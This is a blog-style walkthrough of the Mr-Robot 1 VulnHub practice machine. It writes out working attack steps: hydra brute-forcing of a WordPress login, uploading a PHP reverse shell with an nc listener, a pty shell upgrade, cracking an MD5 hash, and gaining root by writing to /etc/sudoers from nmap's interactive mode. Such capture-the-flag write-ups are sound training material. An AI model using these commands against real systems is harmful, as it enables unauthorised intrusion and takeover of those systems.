Mr-Robot 1 ~ Vulnhub Walkthrough

nmap -a 192.168.1.213

1. Returns port 80 & 443 not a whole lot to work with…

MrRobotwebpage

2. Startup a dirbuster scan while I check out what each of these commands do.

3. Dirbuster begins returning a bunch of directories showing that this website is a wordpress site!

4. Start up wordpress scan

Wpscan 192.168.1.213

5. WordPress scan mentions that a robot.txt is availiable at

robots.txt available under: ‘http://192.168.1.213/robots.txt’

6. Navigate to this page and this is shown.

C:\Users\Graham\Pictures\Mr Robot Writeup\Robottxt.png

7. Navigate to the key-1-of-3.txt and we have our first key!


 

1. Navigate to the fsocity.dic and download a file of 6.6 Mb

The file looks like a wordlist with about 900k words.

Will keep this in mind for potential brute forcing later.

2. Go to the wp-admin site to see what we can find.

“user” potential username?

Wp-admin

Running on Http so view the login request in burp

Here I used username “user” and password “THEREISNOSPOON”

C:\Users\Graham\Pictures\Mr Robot Writeup\Burp output.png

3. When you type in an incorrect user and password on wordpress it will tell you Invalid username! So I created this hydra one liner to brute force usernames until it cannot find the “Invalid Username”

hydra 192.168.1.213 http-form-post "/wp-login:log=^USER^&pwd=^PASS^:Invalid username" -L Desktop/fsocity.dic -p asdf -t 10 -w 30 -o output.txt

4. This command will run hydra to brute for potential usernames!

The username Elliot popped up!

I confirm this by typing in Elliot with a random password

Sure enough I get a bad password error.

5. I now edit my script to brute force the password

Whenever the password I entered was incorrect, I get “The password you entered for the username…”

hydra 192.168.1.213 http-form-post "/wp-login:log=^USER^&pwd=^PASS^:The password you entered" -P Desktop/fsocity.dic -l elliot -t 10 -w 30 -o output.txt

6. So I ran this and the first 10000 passwords didn’t work so I decided to start from the back. I didn’t feel like waiting for all 850k so I started from the back in case Jason decided to be a troll.

Ran the last 10000 passwords but hydra got stuck. One of the child processes did not complete. I guessed that this meant that the password must be in these last 10000. I cut it down to 1000 and tried again, it still got stuck. I realized that all the child process were iterating so in order for them to get stuck they must have gotten stuck in the last 10-15 passwords. This is because we cannot tell if the children moved on because there are no more passwords to check. I ran the last 15 passwords and it still got stuck!

7. At this point I plugged in all 15 passwords manually

The password was ER28-0652

Now we are met with a wordpress site.

C:\Users\Graham\Pictures\Mr Robot Writeup\wordpress.png

8. First thing that comes to mind is a web shell.

9. Attempt to upload a php-reverse-shell.php in the media tab but it “Is not allowed for security reasons”

10. I just started uploading my php-reverse-shell.php everywhere I could.

11. I tried to add it as a plug in and got an error. Something like, “plugin is not valid, failed to install”

C:\Users\Graham\AppData\Local\Microsoft\Windows\INetCache\Content.Word\plugins add new.png

 

However, then I looked at my media and the reverse shell was put there! For some reason if plugins fail to install this version of wordpress puts them into the media directory…

12. Ran this command

nc -lvp 36806

13. Navigated to the reverse shell http://192.168.1.213/php-reverse-shell.php And bam, got reverse shell!

C:\Users\Graham\Pictures\Mr Robot Writeup\Reverse Shell.png

14. Went into the home directory and found key 2 of 3

C:\Users\Graham\Pictures\Mr Robot Writeup\key2.jpg

Except we can’t view it…

15. However! We can view the password hash.

cat password.raw-md5

 

16. This gives us a hash we can easily crack with http://crackstation.net

The password gives us

su robot
Enter Password: abcdefghijklmnopqrstuvwxyz

 

 

This may give you some error saying “Must be run in terminal”

17. Run this command:

python -c "import pty;pty.spawn('/bin/bash')"

 

 

This will “upgrade” your shell.

Now we can see that key!


 

1. At this point I sat here and struggled with stuff trying to figure out what to do so I took a peek at another walkthough are saw the word nmap.

2. I found where nmap was located and realized it was running version 3.81 (current version is 7.21).

Tried to find an exploit for it or something but no luck.

Just did nmap –help and started looking at stuff.

3. After tinkering will a bunch of things, I finally booted into the nmap –interactive.

I type “h” and looked at the help and found that commands would run are root if you prefix them with “!”…

I thought there was no way that something this vulnerable would exist…

4. Sure enough, I ran

! echo "robot ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers
sudo su

And obtained root. Went into the /root directory and found the last key.

2 Comments

Leave a Reply

Your email address will not be published. Required fields are marked *